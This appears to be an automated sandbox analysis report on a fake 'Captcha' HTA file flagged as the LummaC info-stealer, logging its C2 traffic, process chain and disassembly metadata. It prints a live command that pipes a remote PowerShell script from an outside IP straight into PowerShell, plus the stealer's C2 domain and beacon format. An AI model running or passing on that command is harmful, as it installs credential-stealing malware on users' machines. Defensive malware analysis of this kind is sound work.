2024-12-12 16:34:08 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 83 Host: immureprech.biz
2024-12-12 16:34:08 UTC	83	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 45 42 41 4c 41 59 26 6a 3d 26 68 77 69 64 3d 41 42 45 34 41 34 35 44 42 31 32 39 46 44 34 43 44 42 37 31 45 33 32 46 31 32 38 38 35 43 42 33 Data Ascii: act=get_message&ver=4.0&lid=DUkgLv--EBALAY&j=&hwid=ABE4A45DB129FD4CDB71E32F12885CB3
2024-12-12 16:34:09 UTC	1015	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 16:34:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=spqp1joc91crsvd2jobuekg8el; expires=Mon, 07-Apr-2025 10:20:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDrQ0cxjQG0SiQjTqkQL4MmkrGBi23vqzvXzLOWrx2U6%2FqMTSA6s80Mt8VLR%2FA2zW1z3vHzEpHf9QUCp2g%2Bflst5Mb2aWKAm8WKiagd5VUFN7wDpQU13KxpCCDplWFxlM4s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0f1ec4fec17bca-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=114069&min_rtt=113942&rtt_var=24137&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=982&delivery_rate=33607&cwnd=252&unsent_bytes=0&cid=78b7573fb81887e3&ts=902&x=0"
2024-12-12 16:34:09 UTC	54	IN	Data Raw: 33 30 0d 0a 6a 41 2f 75 6f 54 30 72 33 70 45 41 49 4e 45 41 6f 6a 66 48 2f 62 37 42 75 78 70 52 67 76 77 42 64 64 57 6b 49 44 47 74 6e 70 6e 58 55 67 3d 3d 0d 0a Data Ascii: 30jA/uoT0r3pEAINEAojfH/b7BuxpRgvwBddWkIDGtnpnXUg==
2024-12-12 16:34:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	11:33:54
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\Captcha.hta"
Imagebase:	0xb70000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:33:54
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1 \| powershell -NoProfile -ExecutionPolicy Bypass -Command -
Imagebase:	0x570000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:33:54
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b1c00000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:33:54
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bgfi.ps1
Imagebase:	0x5b0000
File size:	386'560 bytes
MD5 hash:	4329254E74AD91D047E3CEDCC7C138C3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:33:54
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -NoProfile -ExecutionPolicy Bypass -Command -
Imagebase:	0xc50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000004.00000002.4103780633.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:33:57
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.cmdline"
Imagebase:	0xf60000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:33:57
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA2B.tmp" "c:\Users\user\AppData\Local\Temp\cqvy0dal\CSC988509BDD3DA4C1893528181DB7478.TMP"
Imagebase:	0xf50000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:33:58
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Imagebase:	0x640000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Function 06D30FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.4064869570.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 06D30FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.4064869570.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 06D30FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.4064869570.0000000006D30000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6d30000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: 07af50981ec2282c2e5c66a3c7af98c3e86f8200d87f03ee080c4e29cc453e53
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 5040, Parent PID: 568COMMON

Executed Functions

Function 07044408 Relevance: 3.0, Strings: 2, Instructions: 510COMMON

Download Yara Rule

Strings

\}i, xrefs: 07044980
\}i, xrefs: 07044972

Memory Dump Source

Source File: 00000004.00000002.4106172583.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: \}i$\}i
API String ID: 0-1667594419
Opcode ID: 557c2065bfc85fc8527ab4080939a412eb2cdfb72557dcaebcc554f6eed51902
Instruction ID: a8c08342e83cac765859bbc84b93f8d2cd73e60e44fd411b9eca23b0dd9e7a0a
Opcode Fuzzy Hash: 557c2065bfc85fc8527ab4080939a412eb2cdfb72557dcaebcc554f6eed51902
Instruction Fuzzy Hash: 4E0206F1B002959FDB64DF64C850B6ABBE6BFC6210F24827AE8169B351DB31DC41CB91

Function 07043DD8 Relevance: .5, Instructions: 513COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4106172583.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe496c5d8bcdfd1247259c176e00b5fd32c9b7095437e94406d1046a962f010
Instruction ID: dceba15a99112639878e9b2a66cfdc2291a35b1d6a7a91fe6174e3d241994167
Opcode Fuzzy Hash: abe496c5d8bcdfd1247259c176e00b5fd32c9b7095437e94406d1046a962f010
Instruction Fuzzy Hash: 54F18AF1B043859FDB649B79C81077EBBE6AFD5210F24867AE416DB281DB31C842C7A1

Function 07042A28 Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4106172583.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 164ed741723cef31eac3ef213edc44a04a6fa48d584db684b3f1c76b70ff2ac6
Instruction ID: 358c240f8e4e9d5be6703f81fc69faf39c44cbfc371af96e817b0cd465fa1757
Opcode Fuzzy Hash: 164ed741723cef31eac3ef213edc44a04a6fa48d584db684b3f1c76b70ff2ac6
Instruction Fuzzy Hash: 2AE16BF6B043468FCB25DB69C4106AABBE6BFC6220B14C2BAE555DB251DB31C842C7D1

Function 070443E7 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4106172583.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06809adb0523afe3694192c70b4f082a2301aa39f996f4789f2c39499f01edd4
Instruction ID: ee262a0b7f8b0881473ee0bbbb9498a1f1972e93fd1325eb935a33f3156c7507
Opcode Fuzzy Hash: 06809adb0523afe3694192c70b4f082a2301aa39f996f4789f2c39499f01edd4
Instruction Fuzzy Hash: 7021B6F4E04286DFDF608F25C540B6A7BF1AF86220F1983B6E8248B162D734D845CB51

Function 00C3EA48 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4099549974.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c3d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7512ce07656868bd3b002e54a0d9e4a358bba893958ff6e135deb2dc65f8db86
Instruction ID: ff6a0b9e7e7b6282143563fe347d2cebbf828575b49d8191cfcfd386cf01a9dd
Opcode Fuzzy Hash: 7512ce07656868bd3b002e54a0d9e4a358bba893958ff6e135deb2dc65f8db86
Instruction Fuzzy Hash: 61210171604340EFDB04DF14D9C0B26BFA5FB84328F24C9ADE8094B286C77AD846DB62

Function 07042A0B Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4106172583.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad2bc0973441f2670779c1a5a9798fd4a3dfcbd5cfa06c414c54b62dd6023cd1
Instruction ID: 17bb605a306ec26baec2fb6feb7bf3864fd3a643bc09d847bf828047a054adf5
Opcode Fuzzy Hash: ad2bc0973441f2670779c1a5a9798fd4a3dfcbd5cfa06c414c54b62dd6023cd1
Instruction Fuzzy Hash: 3421C3F1B042029FCB74CF69C850A6ABBF1FF49260F1882B6E815DB251D731D890CB91

Function 00C3EA43 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4099549974.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c3d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8911cbd85c5730c87f3f82108476fec3023e6c4772167f069a2629271537fb1
Instruction ID: 738d5a68c5094cbb5f5cd6df8c5fe3044264418b798ed7e377cbc5a959c10555
Opcode Fuzzy Hash: e8911cbd85c5730c87f3f82108476fec3023e6c4772167f069a2629271537fb1
Instruction Fuzzy Hash: 6A119D75504280DFDB12CF14D9C4B15FFA1FB84328F28C6AAD8494B696C33AD95ACB61

Function 00C3D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4099549974.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c3d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc6e75dd69cc320fd37d6da3420485872d3013b2c226eebd1cb080771bdfddcf
Instruction ID: 0408b875bbfb58e16337e2baa3399c0c33001ff54de1d0d8d810b39743cef7cf
Opcode Fuzzy Hash: bc6e75dd69cc320fd37d6da3420485872d3013b2c226eebd1cb080771bdfddcf
Instruction Fuzzy Hash: 36015E6240E3C09FE7128B259C94B52BFB4DF53624F1D80DBD8998F2A3C2699C49C772

Function 00C3D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4099549974.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c3d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed5652cc37d3ef4dcdac9c9b0c20e472cdd7bbf3eadf0828f1c91a8b7d1b255
Instruction ID: 1e843caa2c395a309ef495cfed23c6b947954a8dbe2c278e0c48269cc32ad47c
Opcode Fuzzy Hash: fed5652cc37d3ef4dcdac9c9b0c20e472cdd7bbf3eadf0828f1c91a8b7d1b255
Instruction Fuzzy Hash: DD01A2314183809FE7144E26E8C4B67FF98DF91B24F18842AEC5A0A242D679D985CAB1

Analysis Process: RegAsm.exePID: 1848, Parent PID: 5040COMMON

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	74.3%
Total number of Nodes:	342
Total number of Limit Nodes:	15

Executed Functions

Function 004361E0 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 636
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
SysAllocString.OLEAUT32(w!s#), ref: 004364FB
SysAllocString.OLEAUT32(A3q5), ref: 004365A1
VariantInit.OLEAUT32(?), ref: 00436613
VariantClear.OLEAUT32(?), ref: 00436775
SysFreeString.OLEAUT32(?), ref: 004367A0
SysFreeString.OLEAUT32(?), ref: 004367A6
SysFreeString.OLEAUT32(00000000), ref: 004367B3
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004367E7

Strings

T'g), xrefs: 0043652D
A;, xrefs: 0043643C
X&c8, xrefs: 0043628F
z7}9A3q5, xrefs: 004365BB
BC, xrefs: 00436565
Y/9Q, xrefs: 0043653D
C, xrefs: 00436369
w!s#, xrefs: 004364F6, 004364FA

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
API String ID: 2573436264-4124187736
Opcode ID: ca50f7cf4d3e9b07668249a1021e5b411807a3e5f20311e201539803fa80780b
Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
Opcode Fuzzy Hash: ca50f7cf4d3e9b07668249a1021e5b411807a3e5f20311e201539803fa80780b
Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A

Function 0042B4FC Relevance: 12.8, APIs: 3, Strings: 4, Instructions: 519
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042B5FE
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042B63A
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042B726

Strings

/, xrefs: 0042B908
1, xrefs: 0042BB59
%(#}, xrefs: 0042B740
/26-, xrefs: 0042B735

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ComputerName$FreeLibrary
String ID: %(#}$/$/26-$1
API String ID: 2243422189-261129489
Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56

Function 0042B4F7 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 523
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042B63A
GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042B726

Strings

/, xrefs: 0042B908
1, xrefs: 0042BB59
%(#}, xrefs: 0042B740
/26-, xrefs: 0042B735

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID: %(#}$/$/26-$1
API String ID: 3545744682-261129489
Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796

Function 00419770 Relevance: 10.0, APIs: 3, Strings: 2, Instructions: 1211COMMON

Download Yara Rule

APIs

Part of subcall function 0043A9B0: LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE

LookupPrivilegeValueW.ADVAPI32(00000000,83E681E1,?), ref: 00419BF0
FreeLibrary.KERNEL32(?), ref: 00419CD6
FreeLibrary.KERNEL32(?), ref: 00419D3B

Strings

,)*k, xrefs: 00419E54
I,~M, xrefs: 0041A448

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLibrary$InitializeLookupPrivilegeThunkValue
String ID: ,)*k$I,~M
API String ID: 2454411163-936430989
Opcode ID: 409457163dc21f8bbcfc449a1199c6fa7c708d9abd1c96867b818197b9c04ebc
Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
Opcode Fuzzy Hash: 409457163dc21f8bbcfc449a1199c6fa7c708d9abd1c96867b818197b9c04ebc
Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A

Function 00415298 Relevance: 9.9, APIs: 1, Strings: 4, Instructions: 1123COMMON

Download Yara Rule

Strings

kmbj, xrefs: 00415B8C
Z\, xrefs: 00415344
ydij, xrefs: 00415B93
in~x, xrefs: 00415AFB

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: in~x$kmbj$ydij$Z\
API String ID: 0-979945983
Opcode ID: 7cc7601ca1ee28cd6491a20fbffaf33e16e54dbc7ed2fef88dca781f2573c0e0
Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
Opcode Fuzzy Hash: 7cc7601ca1ee28cd6491a20fbffaf33e16e54dbc7ed2fef88dca781f2573c0e0
Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55

Function 004210E0 Relevance: 8.0, Strings: 6, Instructions: 536
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!@, xrefs: 00421116
T, xrefs: 004216BE
V, xrefs: 004216B9
,, xrefs: 0042161E
h, xrefs: 004212F2
U, xrefs: 004216C3

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: !@$,$T$U$V$h
API String ID: 0-1072848446
Opcode ID: 08fd17aa8544526ba1d2fdfa3d98d6b8fa1c8c3fb107b928f0eb9ff563a42c2b
Instruction ID: 7f4f8c271271a0ee30063bf5d57d9afa0b4a7bb7edff0777766b2e5d54dfe869
Opcode Fuzzy Hash: 08fd17aa8544526ba1d2fdfa3d98d6b8fa1c8c3fb107b928f0eb9ff563a42c2b
Instruction Fuzzy Hash: CF22E17160C3A08FD320DF28D44436FBBE1ABD6314F598A2EE5D9873A1D77988458B4B

Function 0040CFF3 Relevance: 7.8, Strings: 6, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3ej, xrefs: 0040D2DD
ABE4A45DB129FD4CDB71E32F12885CB3, xrefs: 0040D049
pr, xrefs: 0040D2F1
ZG, xrefs: 0040D25A
BI, xrefs: 0040D253
immureprech.biz, xrefs: 0040D34A

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ABE4A45DB129FD4CDB71E32F12885CB3$BI$ZG$immureprech.biz$3ej$pr
API String ID: 0-1435887362
Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54

Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004087B4
GetCurrentThreadId.KERNEL32 ref: 004087BE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
GetForegroundWindow.USER32 ref: 00408870

Part of subcall function 0040B9D0: FreeLibrary.KERNEL32(0040896B), ref: 0040B9D6
Part of subcall function 0040B9D0: FreeLibrary.KERNEL32 ref: 0040B9F7

ExitProcess.KERNEL32 ref: 00408972

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 3676751680-0
Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X9{;, xrefs: 0042330B
)*, xrefs: 00423216
r1B, xrefs: 00423169

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: )*$X9{;$r1B
API String ID: 0-1001561910
Opcode ID: 29ddd15023daed27f3a86534da84a75cb2074f1bccf2702bdac9cd2e3ed8f5f9
Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
Opcode Fuzzy Hash: 29ddd15023daed27f3a86534da84a75cb2074f1bccf2702bdac9cd2e3ed8f5f9
Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A

Function 00415F66 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 605
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A67H, xrefs: 004164FD

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: A67H
API String ID: 0-3389657328
Opcode ID: c8e58b8bc47f8f660499b6455e80629c0afce5cc1bbea26fbd3bc9902617d378
Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
